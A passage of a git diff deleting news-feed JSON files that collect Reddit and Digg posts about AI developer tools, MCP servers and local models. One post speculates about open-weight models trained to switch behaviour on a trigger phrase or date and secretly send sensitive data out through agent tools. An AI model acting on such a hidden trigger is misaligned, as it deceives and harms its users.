Easily log into each agent's desktop to view the work it's doing or manually setup the agent environment via a desktop interface The inspiration for this project is wanting a sandbox I can let the agent run free in, while limiting the damage it can do. I want it to be able to browse the web, do automated AI research on my GPU, test my docker containers in a sandbox, develop my webapp full-auto, or whatever other task I need it to do while still being safely in a sandbox and unable to wipe or modify my host system. I felt like either I had to go full YO…", - "category": "ai_models" - }, - { - "title": "We added W8A8 activation quantization to MLX — prefill went from 2.84s to 2.52s on M5 Pro", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tn2p61/we_added_w8a8_activation_quantization_to_mlx/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-25T08:16:51.000Z", - "summary": "Hey, I work on inference tooling at Mininglamp AI. We needed faster prefill for a 4B VLM running on Apple Silicon. Problem was MLX only does weight-only quant — activations stay FP16 the whole way through. So we wrote Cider, a small SDK that adds W8A8 activation quant on top of MLX. Numbers on M5 Pro (64GB, 307 GB/s), 4516 token context: |Quantization|Prefill|Decode| |:-|:-|:-| |W8A16 (MLX)|2.839s|80.1 tok/s| |W8A8 (Cider)|2.519s|79.5 tok/s| Under the hood it's custom Metal kernels we registered as MLX primitives. At M=4096 the per-channel path runs 1.84x faster than W8A16 on the same shape. Not just for our model btw — works with anything that runs through MLX. One catch: INT8 TensorOps only compile on M5 and above. pip install on M4 still works, just falls back to the regular path. Repo: [https://github.com/Mininglamp-AI/cider](https://github.com/Mininglamp-AI/cider) Edit: adding accuracy numbers since it came up. 
Wikitext2 PPL on Qwen3-8B: FP16 9.73, W8A16 9.71, W8A8 per-channel 9.76. Llama3-8B: FP16 6.14, W8A16 6.15, W8A8 per-channel 6.27. Per-group gs=64 keeps it tighter if precision matters more than speed for your use case.", - "category": "ai_models" - }, - { - "title": "xAI releases Grok Build 0.1.219, fixing kitty terminal layout issues and paste-related data loss", - "url": "https://www.digg.com/ai/hlcz47lw", - "source": "Digg AI", - "tags": [ - "product_launch", - "cli_tool" - ], - "matching_tags": [ - "product_launch", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-25T06:00:09.947Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Wrote a custom C++ engine for MiniCPM-V 4.6 on Orange Pi AIPro (Ascend 310B) to bypass framework overhead", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tmy4g9/wrote_a_custom_c_engine_for_minicpmv_46_on_orange/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "open_source", - "developer_tool" - ], - "matching_tags": [ - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-25T04:19:50.000Z", - "summary": "Hey everyone, just wanted to share a project I've been hacking on for the last few weeks. I managed to build a from-scratch C++ inference engine to run MiniCPM-V 4.6 entirely on the Orange Pi AIPro (the budget board with the Ascend 310B NPU, costs around $149 for 20 TOPS INT8 / 10 TFLOPS FP16). If you want to check out the custom ops, build scripts, or the Gradio web UI, the repository is open source on GitHub at [github.com/lvyufeng/minicpm-v-4.6-orangepi](http://github.com/lvyufeng/minicpm-v-4.6-orangepi) https://preview.redd.it/upfsqb0jm73h1.png?width=1655&format=png&auto=webp&s=1e80185171fa6db651d81e20d717b3a05791614c If you've ever tried deploying local LLMs or VLMs on this specific hardware, you probably know that dealing with the standard framework stack can be a massive pain, especially if you want to get any decent performance on the edge. 
To get around this, I skipped the heavy frameworks and went low-level. Both the text generation and the SigLIP vision tower run natively on the NPU inside a single C++ subprocess. There is absolutely zero torch\\_npu dependency on the hot path. Python is only used on the cold path for CPU-side tokenization and image preproces…", - "category": "ai_models" - }, - { - "title": "I shipped a windows desktop app for running local LLMs with a button that turns your \"no thats wrong\" into actual LoRA training data", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tmxp03/i_shipped_a_windows_desktop_app_for_running_local/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-25T03:59:18.000Z", - "summary": "i built a local AI desktop app and just shipped it. windows only. called SEELS. dropping it here cause if anyones gonna find the cracks its you guys. the thing i actually wanted to make wasnt another ollama wrapper. what bugged me is every local model id run would say something dumb and id sit there going \"no thats not what i meant\". then id close the chat and the model never knew, never learned. so the whole hook of SEELS is theres a Teach button on every reply where you write what it should have said. those corrections pile up into a jsonl corpus, and when you have enough you click Train and it actually kicks off a PEFT LoRA run on your base. no notebook, no python, no terminal. just chat, correct, train. over time the adapters stack up and it becomes your model not theirs. trained a tiny 0.6B helper from scratch on like 110 hand written examples so theres something that runs on CPU out of the box. not replacing your daily 35B obviously but it answers questions about how to use SEELS itself which was the point. 
rest of standard (free, forever, not a trial): bring any GGUF, voice mode with whisper STT and piper TTS both local no API keys, hardware dashboard so you can stop guessi…", - "category": "ai_models" - }, - { - "title": "Could Open Models be trained to secretly go rogue?", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tmpqrv/could_open_models_be_trained_to_secretly_go_rogue/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source" - ], - "matching_tags": [ - "api_update", - "open_source" - ], - "importance": 1, - "date": "2026-05-24T22:05:31.000Z", - "summary": "I was discussing with some other folks how safe is to use open weights models from China and the topic of \"trojan horse\" came up. We know that, at least with current architecture, models can't run code on their own. They are entirely dependent on tools and harnesses. We also know that a local run model can't have any kind of remote \"switch\" that would change its behavior or inject a different prompt. But would there be any other ways to \"execute order 66\" 😄 ? Could a lab, for instance, train a model that would change its behavior upon reading certain trigger phrases or perhaps at a specific date? They would then secretly gather sensitive info and send it somewhere else without user consent. Obviously the model would have to be running in an harness capable of such tool-use (which is quite common with openclaws, hermes, etc). 
Thoughts?", - "category": "ai_models" - }, - { - "title": "I made a Chrome extension that lets me use ChatGPT from any webpage without an API key, so its compeletly free.", - "url": "https://reddit.com/r/ChatGPT/comments/1tmznuc/i_made_a_chrome_extension_that_lets_me_use/", - "source": "Reddit r/ChatGPT", - "tags": [ - "api_update", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-25T05:36:32.000Z", - "summary": "I’ve been building a Chrome extension called **Dichrome**. The basic idea is simple: it lets you use ChatGPT from a sidebar while you’re on any webpage, without needing an API key or paying for a separate AI sidebar subscription. For example, in the screenshots I was on my GitHub repo page. I clicked the screenshot button in the Dichrome sidebar, typed “Can you see the attached image?”, and hit send. Dichrome then sent the prompt and screenshot to ChatGPT through the normal ChatGPT UI. I didn’t have to open ChatGPT myself, switch tabs, upload the image manually, or copy anything over. The response came back inside the sidebar, and the actual ChatGPT conversation was also saved inside my **Dichrome project folder**. That part matters to me because I don’t want random sidebar chats cluttering my normal ChatGPT history. Anything started from the extension gets routed into its own project folder instead. The workflow is basically: 1. Stay on whatever webpage you’re using 2. Click screenshot or send selected text 3. Type your prompt in the sidebar 4. Dichrome sends it to ChatGPT through the normal UI 5. The answer shows up back in the sidebar 6. 
The chat gets saved in the Dichrome proj…", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-26.json b/data/news-feed-2026-05-26.json deleted file mode 100644 index bde1ef8..0000000 --- a/data/news-feed-2026-05-26.json +++ /dev/null @@ -1,283 +0,0 @@ -{ - "generated": "2026-06-05T00:44:43.764Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-26", - "article_count": 15, - "archived_story_count": 541, - "articles": [ - { - "title": "open-source plug-in for claude code: declare what it can't do in yaml, enforced at the tool boundary", - "url": "https://reddit.com/r/ClaudeAI/comments/1tofpzr/opensource_plugin_for_claude_code_declare_what_it/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-26T18:29:43.000Z", - "summary": "last week claude code force-pushed on me. nothing in the prompt said it could, it just inferred \"make sure the branch is clean\" loosely. wanted a hard rule i could plug in so this couldn't happen again. so i built sponsio, an open-source plug-in for claude code that gates tool calls at the boundary. apache 2.0. hooks in via the claude agent sdk (or the mcp layer if your tools go through there). write contracts in yaml using assume-guarantee structure (\"if the agent calls X, the trace must satisfy Y\"). when claude code tries to call a tool, sponsio checks first. allow, block, or escalate to human. guarantee clauses are temporal logic over the action trace, so you can also express \"tests must pass before commit\", \"no two writes to the same file in a session\", or \"max N file edits per session\", not just deny-lists. why deterministic: prompts give statistical behavior, not guarantees. once context fills, even obvious rules drift. 
hard guarantees have to live outside the probabilistic part of the system. how claude code helped build it: i sketched the LTL evaluator AST, claude filled in each operator's trace-evaluation case. framework adapters are mostly claude generations from interfa…", - "category": "ai_tools" - }, - { - "title": "Built an MCP server so Claude can generate music, images, and video natively. One config block.", - "url": "https://reddit.com/r/ClaudeAI/comments/1toh1pr/built_an_mcp_server_so_claude_can_generate_music/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "mcp", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-26T19:14:33.000Z", - "summary": "I've been using Claude Code daily for the last few months and kept hitting the same wall: I'd ask Claude to produce a creative artifact (a song, a cover, a short video) and end up writing the API glue myself, then pasting results back into the chat. Felt backwards. So I built an MCP server around my AI generation platform. It exposes three tools to Claude: \\- aw\\_generate\\_music (Suno, full songs with lyrics or instrumental) \\- aw\\_generate\\_image (Z-Image Turbo, Wan 2.5 Spicy, Grok Imagine Quality, GPT-Image-2, Nano Banana 2, and others) \\- aw\\_generate\\_video (Kling 3.0 Standard/Pro/4K T2V + I2V, Wan 2.2, Hailuo 02, Seedance, Grok video) One key. One credit pool. The agent picks the right model for the prompt. Install: npm install -g u/aetherwave-studio/mcp Claude Code config (\\~/.config/claude/mcp.json or wherever yours lives): { \"mcpServers\": { \"aetherwave\": { \"command\": \"npx\", \"args\": \\[\"-y\", \"@aetherwave-studio/mcp\"\\], \"env\": { \"AW\\_API\\_KEY\": \"aw\\_live\\_YOUR\\_KEY\\_HERE\" } } } } Restart Claude. Done. Prompts that work end-to-end without any additional setup: 1. 
\"Generate a 60-second lo-fi track for a study playlist, then make me 3 album cover options in a retro Japanese prin…", - "category": "ai_tools" - }, - { - "title": "Small set of local MCP server installers for home Linux users", - "url": "https://reddit.com/r/LocalLLaMA/comments/1to8y2i/small_set_of_local_mcp_server_installers_for_home/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "mcp", - "open_source" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-05-26T14:39:11.000Z", - "summary": "Hi all, I have published a small open-source MCP server bundle called **MCP Basic Servers**: [https://github.com/mchowy-troll/mcp-basic-servers](https://github.com/mchowy-troll/mcp-basic-servers) It is a collection of simple Bash installer scripts for running local **MCP HTTP servers on Linux**. **The idea is simple: run one script, answer a few questions, get a working local MCP endpoint at \\`/mcp\\`.** This project is mainly for **beginner and intermediate Linux users** who want to experiment with MCP tools at home without manually setting up Python environments, systemd services, SQLite databases, or local web search from scratch. It is not meant to be an enterprise-grade or hardened production platform. It is intentionally simple, readable, and designed for local/home use. 
The first release includes six servers: * **web** — live web search and webpage fetching through local SearXNG * **files** — local workspace tools for text, CSV, Markdown and PDF * **memory** — local SQLite-based memory * **contacts** — local SQLite-based contacts * **wiki\\_verifier** — Wikidata and Wikipedia context/verification tools * **weather** — weather tools using Open-Meteo Default ports are \\`8001-80…", - "category": "ai_models" - }, - { - "title": "Harbor v0.4.19 - vllm/sglang/llama.cpp launch codex/claude/pi/opencode", - "url": "https://reddit.com/r/LocalLLaMA/comments/1to8t53/harbor_v0419_vllmsglangllamacpp_launch/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "product_launch", - "cli_tool", - "agent_tool" - ], - "matching_tags": [ - "product_launch", - "cli_tool", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-26T14:34:19.000Z", - "summary": "I'm usually not posting about Harbor releases out of the respect for the community here, but I think v0.4.19 might save a lot of people some time. Harbor can now launch your local agentic coding tools with local inference backends. 
For example, to run pi + vllm: # model downloaded and configured harbor up vllm # Harbor knows that vllm is running and will use it harbor launch pi Additionally, `launch` can proxy requests through built-in optimising LLM gateway which automatically injects and resolves tools, such as web search, so you can add web search to an agent by just appending `--web` to the command and Harbor will pre-wire everything: harbor launch --web --model qwen3.5:4b --backend ik_llamacpp mi -p 'Find recent releases of agentic tools and write a two sentence overview' You can find many more details in the wiki here: [https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args](https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args) Thank you!", - "category": "ai_models" - }, - { - "title": "This is insane.", - "url": "https://reddit.com/r/ClaudeAI/comments/1to6zg8/this_is_insane/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "open_source" - ], - "matching_tags": [ - "api_update", - "mcp", - "open_source" - ], - "importance": 1, - "date": "2026-05-26T13:28:34.000Z", - "summary": "Just installed an open source tool that wiped most of the tool-definition tokens out of my Claude Code context before any prompt. Same MCP servers. Same tools available. 8 servers, 142 tools across them. Before: the tool definitions ate 38k tokens of context every single turn. Cold start, my context bar was already orange and I hadn't typed anything. After: 4k. The Claude Code session sees three tools (`search_tools`, `invoke_tool`, `auth`) and dispatches everything else under the hood. When I ask for a thing, it ranks the catalog with BM25 in microseconds and surfaces the top 5. The part nobody's talking about: there's no LLM in the ranking loop. No embedding API to pay. No vector DB to host. 
It's keyword search over a flat projection of tool name + description, deterministic, offline. Apparently this was always going to be enough. It's [Ratel](https://github.com/ratel-ai/ratel). Open source. The install is `ratel mcp import` and it migrates your existing Claude Code MCP config in one command, with backups written automatically. Took me 90 seconds. Why is every \"context layer\" startup pitching me semantic embeddings and inference-time re-ranking when basic BM25 over tool definiti…", - "category": "ai_tools" - }, - { - "title": "Find where claude code burns your tokens", - "url": "https://reddit.com/r/ClaudeAI/comments/1toagk7/find_where_claude_code_burns_your_tokens/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "developer_tool", - "cli_tool" - ], - "importance": 0.8600000000000001, - "date": "2026-05-26T15:32:11.000Z", - "summary": "I started using claude code as a harness for a side project a few months ago, and the native OTLP exporter gives you metrics and event logs but not the full execution path you need to actually debug. Also, I needed to keep token usage under control too. So I built a package that installs a Stop hook in ~/.claude/settings.json. Claude Code runs this hook automatically every time a turn ends. The hook reads the new portion of the transcript, reconstructs the turn as opentelemetry spans, and posts them to latitude's OTLP endpoint. Install: npx -y @latitude-data/claude-code-telemetry install Works in CLI, desktop app, and IDE extensions. Disclosure: I work at Latitude. I did this for personal needs but now it’s integrated on the product. It's free, MIT-licensed, source is on GitHub. 
Happy to answer technical doubts", - "category": "ai_tools" - }, - { - "title": "Anyone else dread keeping web, Android, and iOS releases in sync?", - "url": "https://reddit.com/r/ClaudeAI/comments/1tnr1vf/anyone_else_dread_keeping_web_android_and_ios/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "product_launch", - "cli_tool", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "cli_tool", - "tool_update" - ], - "importance": 0.8600000000000001, - "date": "2026-05-26T00:37:17.000Z", - "summary": "I got tired of every “small update” turning into version bumps, patch notes, store metadata, web deploys, Android uploads, TestFlight builds, and one more iOS step I couldn’t even run locally because I don’t own a Mac. I have a game built with React + Vite + Matter.js + Capacitor. It’s live on web, Android, and iOS. I was getting worn down by the release chores: version bumps, build numbers, localized patch notes, store metadata, Capacitor syncs, signing, uploads, all the little steps that are easy to mess up and also ridiculously time consuming. Also, I don’t own a Mac, so I thought iOS was out of the question... until.... 
I wired the repo so Claude can take a normal request like: “ship the updates since our last version bump, browser, Android, and iOS TestFlight with release notes” then the Claude code gets to work with a repeatable path: \\- bump the right versions/build numbers both in build and in game ui \\- create patch notes for every supported language \\- run lint/typecheck/build through \\`npm run verify\\` \\- sync Capacitor after the web build \\- build and upload iOS to TestFlight from GitHub Actions on a macOS runner \\- build an Android AAB and upload it to Google Play \\-…", - "category": "ai_tools" - }, - { - "title": "Claude makes documents into apps", - "url": "https://reddit.com/r/ClaudeAI/comments/1toajqg/claude_makes_documents_into_apps/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "open_source", - "tool_update", - "agent_tool" - ], - "matching_tags": [ - "open_source", - "tool_update", - "agent_tool" - ], - "importance": 0.7, - "date": "2026-05-26T15:35:15.000Z", - "summary": "# Any document can become an app I’ve been working on an open-source document format and viewer called **Adaptive Markdown**. The basic idea is simple: A document should not have to stay static. It should be something a coding agent can extend, reshape, and turn into an interactive workspace. This is not just a canvas you edit with a chatbot. The bigger idea is that the document becomes both: 1. the source of truth 2. the programmable interface In other words, the document becomes a living app. You write notes, collect data, draft text, or import files. Then a coding agent can directly modify the document surface: add charts, create calculators, build filters, restyle sections, generate summaries, export views, or turn rough notes into an interactive tool. So instead of having: * a document * a spreadsheet * a dashboard * an app * a changelog * a separate AI chat about all of it You can have one living `.md` file that contains those layers together. 
# Example A fitness log might start as a plain Markdown journal. Then the agent adds charts. Then it pulls in device data. Then it adds weekly summaries, rolling averages, goal tracking, export options, and a dashboard view. The docume…", - "category": "ai_tools" - }, - { - "title": "Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarksIt prevents enterprise cost overruns from overusing frontier models", - "url": "https://www.digg.com/ai/5nn022fp?rank=3", - "source": "Digg AI", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-26T15:24:13.377Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarks", - "url": "https://www.digg.com/ai/5nn022fp", - "source": "Digg AI", - "tags": [ - "api_update", - "product_launch" - ], - "matching_tags": [ - "api_update", - "product_launch" - ], - "importance": 1, - "date": "2026-05-26T15:24:13.366Z", - "summary": null, - "category": "ai_tools" - }, - { - "title": "i benchmarked Anthropic's tool-search-tool head to head against our own MCP gateway on Opus 4.7. ours held up noticeably better", - "url": "https://reddit.com/r/ClaudeAI/comments/1to7byy/i_benchmarked_anthropics_toolsearchtool_head_to/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-26T13:41:20.000Z", - "summary": "i'd been running Claude Code with a long list of MCP servers connected. Linear, Notion, GitHub, Slack, a few internal ones. and i was pretty confident that Opus 4.7 plus Claude Code's built in tool-search-tool would just absorb all of it. it mostly did. but i was still hitting \\~20% context saturation way too often, before doing any actual work. 
tried Ratel (our own MCP gateway, we built it for exactly this problem) kind of out of curiosity. then we benchmarked it properly, head to head against Anthropic's own tool-search-tool, same model (Opus 4.7), realistic tool catalogs at 50 / 100 / 180 tools. at the 180 tool pool, measured against the full-catalog baseline: * Ratel: near parity on accuracy (about -1.7pp) and roughly -81% input tokens. * Anthropic's tool-search-tool: about -8.4pp accuracy. so somewhere around 5x the accuracy hit, same model, same catalog. the takeaway for me: a big context window and a built in tool search are not the same thing as a gateway thats actually optimised for the one job of deciding what enters context. repo plus the full benchmark, numbers and methodology, is here: [github.com/ratel-ai/ratel](http://github.com/ratel-ai/ratel) happy to be wrong on…", - "category": "ai_tools" - }, - { - "title": "I didn't want blind multi-agent orchestration or API rates, so I built atrium to keep me in the loop with my CLI agents.", - "url": "https://reddit.com/r/ClaudeAI/comments/1to69z3/i_didnt_want_blind_multiagent_orchestration_or/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "cli_tool" - ], - "matching_tags": [ - "api_update", - "cli_tool" - ], - "importance": 1, - "date": "2026-05-26T13:01:47.000Z", - "summary": "I'd been running multi-agent workflows for a while. Whether it was across multiple projects or on the same project. Brainstorming sessions, planning sessions, builds happening in worktrees, asking for Claude's opinion on new tires for my car cause it was closer to hand than Google. This felt really clunky in most of the tools I was using and when I started looking for alternatives, everything felt like it was trying to remove me from the equation and just run agents in the background. So, I built atrium. A macOS human-in-the-loop multi-agent workspace. 
The entire project was built with [the BMad Method](https://github.com/bmad-code-org/BMAD-METHOD?tab=readme-ov-file) and Claude Code (mostly Opus). It's over 60 BMad written epics in now and counting. atrium makes CLI agents first-class citizens within a versatile, tiling workspace. It wires up agents via hooks to the app to surface interactive activity cards, saves state comprehensively so everything resumes, provides a robust CLI that allows agents to completely drive the app, and gives me every tool I need to get the job done. Happy to answer any questions about it and would love to hear how y'all are handling multi-agent workflo…", - "category": "ai_tools" - }, - { - "title": "Just passed the new Claude Certified Architect - Foundations (CCA-F) exam with a 985/1000!", - "url": "https://reddit.com/r/ClaudeAI/comments/1to0xfc/just_passed_the_new_claude_certified_architect/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "tool_update" - ], - "matching_tags": [ - "api_update", - "tool_update" - ], - "importance": 1, - "date": "2026-05-26T08:41:48.000Z", - "summary": "The original post was removed by Reddit Filters, so I made new one with same content. I just got my results back today and managed to snag the Early Adopter badge as well. Following up on my recent DP-600 certification, I really wanted to validate my architecture skills specifically on the Anthropic side. The exam covers a lot of practical ground on prompt engineering for tool use, managing context windows efficiently, and handling Human-in-the-Loop workflows. 
Link to join: https://anthropic.skilljar.com/claude-certified-architect-foundations-access-request Training courses: https://anthropic.skilljar.com/ Cookbook: https://github.com/anthropics/anthropic-cookbook I've created my own Playbook and Mock Exam after the exam: https://drive.google.com/file/d/1luC0rnrET4tDYtS7xe5jUxMDZA-4qNf-/view?usp=sharing https://claude-certified-architect-mock-exam-cyberskill.vercel.app If anyone is preparing for this right now and has questions about the format or the types of architectural patterns tested, ask away! Happy to share some insights on what to study. Updated 26th May 2026: I noticed some mates treated me bananas (https://buymeacoffee.com/zintaen), didn't expect that, but you made my d…", - "category": "ai_tools" - }, - { - "title": "Finally tested an AI video tool that works directly in Claude without setup", - "url": "https://reddit.com/r/ClaudeAI/comments/1tnx7ka/finally_tested_an_ai_video_tool_that_works/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp" - ], - "matching_tags": [ - "api_update", - "mcp" - ], - "importance": 1, - "date": "2026-05-26T05:19:37.000Z", - "summary": "Been using Claude for everything creative lately and got tired of switching to Runway every time I needed video. Found out Higgsfield supports MCP, connected it once, and now Claude generates video directly in chat. Setup is pretty simple. Settings → Connectors → Add custom → paste the MCP URL → sign into Higgsfield once. No API keys or extra setup. Once connected, I describe what I want and Claude handles model selection and rendering. The model variety surprised me. The connector gives access to 20+ video models through one chat: Sora 2, Veo 3.1, Kling 3.0, Seedance 2.0, MiniMax Hailuo, plus Higgsfield's own Soul Cinema and Cinema Studio. Claude picks one based on the prompt or I can choose manually. Real example from yesterday. Asked Claude for a cinematic shot of a soldier reading a letter. 
Claude picked Cinema Studio, set up cinematic mode, rendered it, and dropped the clip in chat. Maybe around 90 seconds total. Couple caveats: uses Higgsfield credits separately from your Claude sub, max 15 seconds per clip, starter credits for new accounts. The bigger win is workflow continuity. Production stays inside the same conversation where I'm researching and writing. Anyone else usi…", - "category": "ai_tools" - }, - { - "title": "Scoble: FDOT Launches 120 AI Companies At A Sold-Out San Francisco Event", - "url": "https://x.com/Scobleizer/status/2057868124112982526", - "source": "Aligned News (Scoble)", - "tags": [ - "product_launch", - "tool_update" - ], - "matching_tags": [ - "product_launch", - "tool_update" - ], - "importance": 1, - "date": "2026-05-26T02:23:28.350Z", - "summary": "Robert posted that FDOT launched 120 AI companies at a sold-out San Francisco event.", - "category": "ai_tools" - } - ] -} \ No newline at end of file diff --git a/data/news-feed-2026-05-27.json b/data/news-feed-2026-05-27.json deleted file mode 100644 index 19b3519..0000000 --- a/data/news-feed-2026-05-27.json +++ /dev/null @@ -1,265 +0,0 @@ -{ - "generated": "2026-06-05T00:44:44.008Z", - "generatedBy": "Studio news backfill", - "site": "Stack Scout", - "date": "2026-05-27", - "article_count": 15, - "archived_story_count": 680, - "articles": [ - { - "title": "MarkdownAI v2.0, its a workflow engine, not a template parser", - "url": "https://reddit.com/r/ClaudeAI/comments/1tpjmh3/markdownai_v20_its_a_workflow_engine_not_a/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "api_update", - "mcp", - "tool_update" - ], - "matching_tags": [ - "api_update", - "mcp", - "tool_update" - ], - "importance": 1, - "date": "2026-05-27T21:42:18.000Z", - "summary": "MarkdownAI is a workflow and runbook engine for AI. Yes, it’s also a templating language, but that’s the least interesting thing about it. The power is the MCP server. Claude never sees a stale file again. 
Every document resolves live, every time. Simple example: your frontmatter. Status fields, version numbers, last-updated dates, owner, the stuff that’s wrong within a week of writing it. With MarkdownAI, frontmatter becomes live. Claude doesn’t read “status: in-progress” from three weeks ago. It reads the actual current state, fetched at render time. No staleness. No verification step. No “is this still true?” check that costs a tool call. That same idea scales to everything in the document, DB record counts, branch names, env values, test results, file trees. Anything that goes stale becomes live. **The grunt work problem** Before Claude does anything useful, it does housekeeping. Verify the branch. Check CI. Query the DB. Hit the health endpoint. Read env vars. Confirm the image exists. Check migrations. That’s a real pre-deployment runbook, and Claude is doing all of it, one tool call at a time. Each check is roughly 2 seconds of dead time plus a context interruption where Cl…", - "category": "ai_tools" - }, - { - "title": "I ran 8 open-weight models as agents in a persistent MMO for 10 days. Here's the 93k event dataset and some things that I learned", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tp6pg7/i_ran_8_openweight_models_as_agents_in_a/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "developer_tool" - ], - "importance": 1, - "date": "2026-05-27T14:09:26.000Z", - "summary": "Howdy everyone! Quick disclosure: I work on this - it's a project my studio created called the Null Epoch. I wasn't really happy with testing my agents with the usual static benchmarks and I wanted to learn more about how models and agents handle long-horizon planning, resource contention, and adversarial pressure over days or weeks in a more dynamic situation. 
I also have a particular fondness for the MUDs and text based RPGs I grew up on (really dating myself here), so the whole MMO and the open source SDK/TUI are kind of modeled after that experience. It functions as a persistent stress test (in MMORPG form!) where every \"player\" is an LLM agent. The first 10-day run (Season 0) used 25 agents across 8 open-weight models (Qwen3 235B & 32B, Nemotron 3 Nano 30B, Ministral 14B & 8B, Gemma 3 12B, GLM 4.7 Flash, etc.). I've published the dataset to HuggingFace (CC-BY-4.0). It's around 93,000 logged events and agent actions, and ~70% of the actions include the model's reasoning/justification for the action it took. I'm hoping to include the actual `<think>` reasoning traces in future datasets. **Link:** [FirespawnStudios/null-epoch-season-0-open](https://huggingface.co/d…", - "category": "ai_models" - }, - { - "title": "Found a Rust TUI coding agent that aggressively trims context with AST-level chunking. Cut my token bleed sharply with DeepSeek V4 Flash.", - "url": "https://reddit.com/r/LocalLLaMA/comments/1tp0a5e/found_a_rust_tui_coding_agent_that_aggressively/", - "source": "Reddit r/LocalLLaMA", - "tags": [ - "api_update", - "open_source", - "agent_tool" - ], - "matching_tags": [ - "api_update", - "open_source", - "agent_tool" - ], - "importance": 1, - "date": "2026-05-27T09:20:45.000Z", - "summary": "been hunting for a coding agent that doesn't dump my entire directory tree into every prompt. found vtcode on github — open-source rust tui, surprisingly aggressive on context management. what makes it different from the usual agent frameworks: most shovel the whole codebase context into prompts and burn tokens fast. vtcode goes the opposite way — explicit token budget tracking plus ast-level context extraction via ripgrep + ast-grep. only the structurally relevant code chunks get sent to the model. on my refactor tasks the prompt size dropped sharply. sandboxing isn't an afterthought either. 
macos seatbelt + linux landlock + seccomp + tree-sitter-bash validation on every model-generated command. the agent stays in your workspace, doesn't roam. paired it with deepseek v4 flash since the public endpoint throttles during peak dev hours. better latency through a third-party endpoint. vtcode natively supports openai-compatible custom providers so plugging in is a single config block: [ agent ] provider = \"atlas\" default_model = \"deepseek-ai/deepseek-v4-flash\" [[ custom_providers ]] name = \"atlas\" base_url = \"https://api.atlascloud.ai/v1\" api_key_env = \"ATLAS_API_KEY\" model = \"deepseek…", - "category": "ai_models" - }, - { - "title": "I built a tool that lets your AI assistant test your entire app in a real browser", - "url": "https://reddit.com/r/ClaudeAI/comments/1tostnb/i_built_a_tool_that_lets_your_ai_assistant_test/", - "source": "Reddit r/ClaudeAI", - "tags": [ - "mcp", - "open_source", - "developer_tool" - ], - "matching_tags": [ - "mcp", - "open_source", - "developer_tool" - ], - "importance": 0.9400000000000001, - "date": "2026-05-27T02:55:55.000Z", - "summary": "So i've been working on this thing called Vibe Testing for a while now and finally putting it out there. Basically it's an MCP server that plugs into Claude Code, Cursor, Windsurf etc. you tell your AI assistant \"test the login flow\" and it actually does it, reads your source code to understand real selectors and routes, opens a real Playwright browser, clicks through stuff, takes screenshots, and tells you what broke. No test files to write or maintain. it figures out your framework, your routes, your forms from the codebase itself. it even remembers what worked and what was flaky between runs so it gets better over time. 12 tools total, scanning your codebase, exploring pages, executing test scenarios, generating reports, the whole thing. Setup is one command: npx vibe-testing@latest init it auto-detects your editors and configures everything. 
